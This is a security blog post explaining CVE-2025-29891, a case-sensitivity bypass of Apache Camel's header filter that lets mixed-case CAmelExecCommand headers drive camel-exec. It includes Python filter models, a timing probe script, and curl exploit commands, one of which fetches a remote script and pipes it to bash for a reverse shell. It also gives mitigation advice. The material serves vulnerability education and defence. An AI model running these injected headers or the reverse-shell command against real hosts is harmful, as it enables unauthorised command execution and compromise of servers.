
Aug 8, 2025
CVE-2025-29891 – Apache Camel Exploit via CAmelExecCommandArgs Header Injection
Discover how CVE-2025-29891 impacts Apache Camel via CAmelExecCommandArgs header injection. Learn how attackers exploit this misconfiguration for remote code execution and how to secure your systems.
Overview
CVE-2025-29891 is a remote command injection issue in Apache Camel that becomes reachable when an HTTP-facing route hands message headers to the camel-exec component. Affected releases (4.10.0 to 4.10.1, 4.8.0 to 4.8.4 and 3.10.0 to 3.22.3) ship a default incoming-header filter that drops request headers whose names start with the exact strings "Camel", "camel" or "org.apache.camel.", but the comparison is case-sensitive while Camel's own header map is not. A name such as CAmelExecCommandExecutable or CAmelExecCommandArgs therefore passes the filter, lands in the exchange and is honoured by camel-exec, which runs whatever it names. Exploitation requires an attacker who can send requests to an HTTP-exposed Camel route that reaches camel-exec, and is easier where additional hardening (authentication, header stripping, egress control) is missing. Apache tracks this as a pair with CVE-2025-27636, which OffSec covered in an earlier blog post: that advisory describes the bypass via HTTP headers, and the CVE-2025-29891 advisory the same filter weakness reached via HTTP request parameters. Both are fixed by the same releases.
- CVE ID: CVE-2025-29891
- Severity: Medium
- CVSS Score: 4.8
- EPSS Score: 0.24%
- Impact: Remote Code Execution
- Attack Vector: Network
- Authentication Required: No
- Vulnerable Component: camel-exec route in Apache Camel
Technical Breakdown
Apache Camel lets message headers override the command configured on a route. When a route ends in the camel-exec component, two headers decide what runs:
- CamelExecCommandExecutable – the binary to run (e.g., curl, bash)
- CamelExecCommandArgs – the arguments passed to the binary
Camel's HTTP server components (the advisory lists camel-servlet, camel-jetty, camel-undertow, camel-netty-http and camel-platform-http) copy inbound request headers into the exchange and rely on the default header filter to strip Camel-internal names. In affected versions the filter only matches the exact prefixes "Camel", "camel" and "org.apache.camel.", whereas header lookup inside Camel is case-insensitive. A request header spelled CAmelExecCommandExecutable is thus not stripped, yet camel-exec still reads it as CamelExecCommandExecutable. Anyone who can reach such a route can choose the executable and its arguments and run arbitrary commands on the host.
Conditions for Exploitation
- The Apache Camel instance must expose an HTTP endpoint utilizing camel-exec.
- The attacker must be able to send crafted HTTP requests to the endpoint.
- The instance must run an affected Camel version, whose default filter only strips the exact prefixes Camel, camel and org.apache.camel., and the route must not otherwise remove or overwrite the exec headers (for example with removeHeaders) before the exec step, so that the mixed-case CAmelExecCommandExecutable and CAmelExecCommandArgs headers reach camel-exec.
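The following Python script is an added example, not Apache Camel source code and not part of the OffSec post. It reimplements the two behaviours that make the bypass work, the exact-prefix, case-sensitive header filter of affected versions and camel-exec's case-insensitive header lookup, alongside a case-insensitive filter of the kind the fix introduces, and runs both over a constructed HTTP request so the effect can be reproduced offline. The header names are the documented camel-exec ones; the request, host and values are made up for the example.

```python
"""Model of the case-sensitive header filter bypass behind this CVE.

Added example, not Camel code: plain-Python stand-ins for the affected
default incoming-header filter, a hardened case-insensitive filter, and
camel-exec's header lookup. The HTTP request at the bottom is constructed.
"""
from typing import Dict, List, Optional, Tuple

# Exact prefixes stripped by the affected filter; the comparison is case-sensitive.
BLOCKED_PREFIXES = ("Camel", "camel", "org.apache.camel.")

# Header names camel-exec reads; Camel's header map matches them case-insensitively.
EXEC_EXECUTABLE = "CamelExecCommandExecutable"
EXEC_ARGS = "CamelExecCommandArgs"


def vulnerable_filter(headers: Dict[str, str]) -> Dict[str, str]:
    """Affected versions: drop only names starting with an exact blocked prefix."""
    return {n: v for n, v in headers.items() if not n.startswith(BLOCKED_PREFIXES)}


def fixed_filter(headers: Dict[str, str]) -> Dict[str, str]:
    """Hardened variant: compare prefixes case-insensitively."""
    blocked = tuple(p.lower() for p in BLOCKED_PREFIXES)
    return {n: v for n, v in headers.items() if not n.lower().startswith(blocked)}


def exec_command(exchange_headers: Dict[str, str]) -> Optional[Tuple[str, str]]:
    """Mimic camel-exec's binding: a header, matched case-insensitively, overrides
    the command configured on the route. Returns (executable, args) or None."""
    lookup = {n.lower(): v for n, v in exchange_headers.items()}
    exe = lookup.get(EXEC_EXECUTABLE.lower())
    if exe is None:
        return None
    return exe, lookup.get(EXEC_ARGS.lower(), "")


def parse_headers(raw_request: str) -> Dict[str, str]:
    """Minimal parser for a raw HTTP/1.1 request head (request line, then headers)."""
    headers: Dict[str, str] = {}
    for line in raw_request.split("\r\n")[1:]:
        if not line:  # blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return headers


def find_bypass_headers(raw_request: str) -> List[str]:
    """Detection helper: names that survive the affected filter but that a
    case-insensitive filter would drop, i.e. mixed-case Camel* injection attempts."""
    headers = parse_headers(raw_request)
    survived = vulnerable_filter(headers)
    hardened = fixed_filter(headers)
    return sorted(n for n in survived if n not in hardened)


# Constructed request: two bypass headers plus one correctly cased header that
# even the affected filter strips.
SAMPLE_REQUEST = (
    "GET /api/system-version HTTP/1.1\r\n"
    "Host: 192.168.56.80:8080\r\n"
    "User-Agent: curl/8.5.0\r\n"
    "CAmelExecCommandExecutable: sleep\r\n"
    "CAmelExecCommandArgs: 5\r\n"
    "CamelExecCommandExecutable: id\r\n"
    "\r\n"
)

if __name__ == "__main__":
    hdrs = parse_headers(SAMPLE_REQUEST)
    print("bypass headers seen:", find_bypass_headers(SAMPLE_REQUEST))
    print("affected version would run:", exec_command(vulnerable_filter(hdrs)))
    print("fixed version would run:", exec_command(fixed_filter(hdrs)))
```

find_bypass_headers is the piece worth lifting into a WAF rule or log query: any inbound header whose lower-cased name starts with camel or org.apache.camel. has no legitimate reason to come from a client, and the mixed-case spelling is the signature of this bypass.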
Exploitation
A route that forwards inbound headers into camel-exec over HTTP can be driven remotely with nothing more than two request headers. The impact is greatest when the route sits behind a web-accessible endpoint such as /api/system-version.
A harmless first probe is to make the route sleep; a response delayed by roughly five seconds confirms the headers reach camel-exec:
curl --header "CAmelExecCommandExecutable: sleep" \
--header "CAmelExecCommandArgs: 5" \
http://192.168.56.80:8080/api/system-version
Or for full remote command execution with a reverse shell:
curl --header "CAmelExecCommandExecutable: curl" \
--header "CAmelExecCommandArgs: 192.168.18.5:3333/rev.sh -o /tmp/rev.sh | bash /tmp/rev.sh" \
http://192.168.56.80:8080/api/system-version
The surviving headers are passed straight to camel-exec, which runs the named binary on the host, so an attacker gains shell access whenever the server can reach them for the payload. Note that camel-exec executes the binary directly through Apache Commons Exec rather than via a shell, and splits CamelExecCommandArgs on whitespace, so shell operators such as the pipe above are only interpreted if the executable named is itself a shell (for example bash with a quoted -c argument).
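As an added example (not from the OffSec post or lab), the script below turns the sleep probe into a repeatable check: it times a baseline request, a short sleep and a longer sleep, and only reports the endpoint as vulnerable when the delay tracks the requested duration, so a merely slow server does not produce a false positive. The transport is injectable, and the two fake senders at the end are constructed stand-ins so the decision logic can be exercised offline; the default target URL is the one used in the post and is an assumption.

```python
"""Time-based check for the camel-exec header bypass.

Added example, not part of the OffSec post or lab. Sends baseline, short-sleep
and long-sleep requests and compares the timings; the transport is a parameter
so the logic can run against the constructed fake senders below.
"""
import sys
import time
import urllib.error
import urllib.request
from typing import Callable, Dict

HEADER_EXE = "CAmelExecCommandExecutable"   # mixed case defeats the affected filter
HEADER_ARGS = "CAmelExecCommandArgs"

Sender = Callable[[str, Dict[str, str]], None]


def http_send(url: str, headers: Dict[str, str], timeout: float = 30.0) -> None:
    """Real transport: one GET carrying the given headers; the body is discarded."""
    req = urllib.request.Request(url, headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            resp.read()
    except urllib.error.HTTPError:
        pass  # an error status still tells us how long the route took


def timed(send: Sender, url: str, headers: Dict[str, str]) -> float:
    """Seconds taken by one request."""
    start = time.monotonic()
    send(url, headers)
    return time.monotonic() - start


def sleep_headers(seconds: float) -> Dict[str, str]:
    """The two bypass headers that make camel-exec run `sleep <seconds>`."""
    return {HEADER_EXE: "sleep", HEADER_ARGS: f"{seconds:g}"}


def probe(url: str, send: Sender = http_send,
          short: float = 2.0, longer: float = 6.0, slack: float = 1.0) -> bool:
    """True when response time grows with the requested sleep, within `slack` seconds."""
    baseline = timed(send, url, {})
    t_short = timed(send, url, sleep_headers(short))
    t_long = timed(send, url, sleep_headers(longer))
    return (t_short - baseline >= short - slack
            and t_long - t_short >= (longer - short) - slack)


# Constructed stand-ins for offline testing of the decision logic.
def fake_vulnerable_sender(url: str, headers: Dict[str, str]) -> None:
    """Behaves like an affected route: honours `sleep N` from the bypass headers."""
    if headers.get(HEADER_EXE) == "sleep":
        time.sleep(float(headers[HEADER_ARGS]))


def fake_patched_sender(url: str, headers: Dict[str, str]) -> None:
    """Behaves like a fixed route: constant latency, headers ignored."""
    time.sleep(0.05)


if __name__ == "__main__":
    # Assumed default target, taken from the post; pass your own URL as argv[1].
    target = sys.argv[1] if len(sys.argv) > 1 else "http://192.168.56.80:8080/api/system-version"
    print("vulnerable" if probe(target) else "not confirmed", target)
```

Run it as `python3 probe.py http://target:8080/api/system-version` against a lab host. Two sleep durations are used on purpose: a single delayed response could be network jitter or a slow backend, whereas a delay that moves with the argument you control is attributable to camel-exec.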
Try Hands-On
You can try exploiting this vulnerability in a controlled environment via the OffSec lab for CVE-2025-29891.
Mitigation
- Upgrade Apache Camel to a fixed release: 4.10.2, 4.8.5 or 3.22.4. These releases also carry the fix for CVE-2025-27636.
- Do not expose camel-exec routes over publicly accessible endpoints.
- Strip or overwrite control headers before the exec step: call removeHeaders("*") (or remove Camel* names case-insensitively) on the inbound message and set CamelExecCommandExecutable and CamelExecCommandArgs from constants in the route rather than trusting anything the client sent.
- Validate and sanitize any remaining headers and inputs before invoking command execution.
- Use proper authentication and authorization around sensitive routes.
- Consider disabling or removing the camel-exec component unless absolutely required.
- Restrict outbound access from the server to prevent reverse shells or external payload fetching.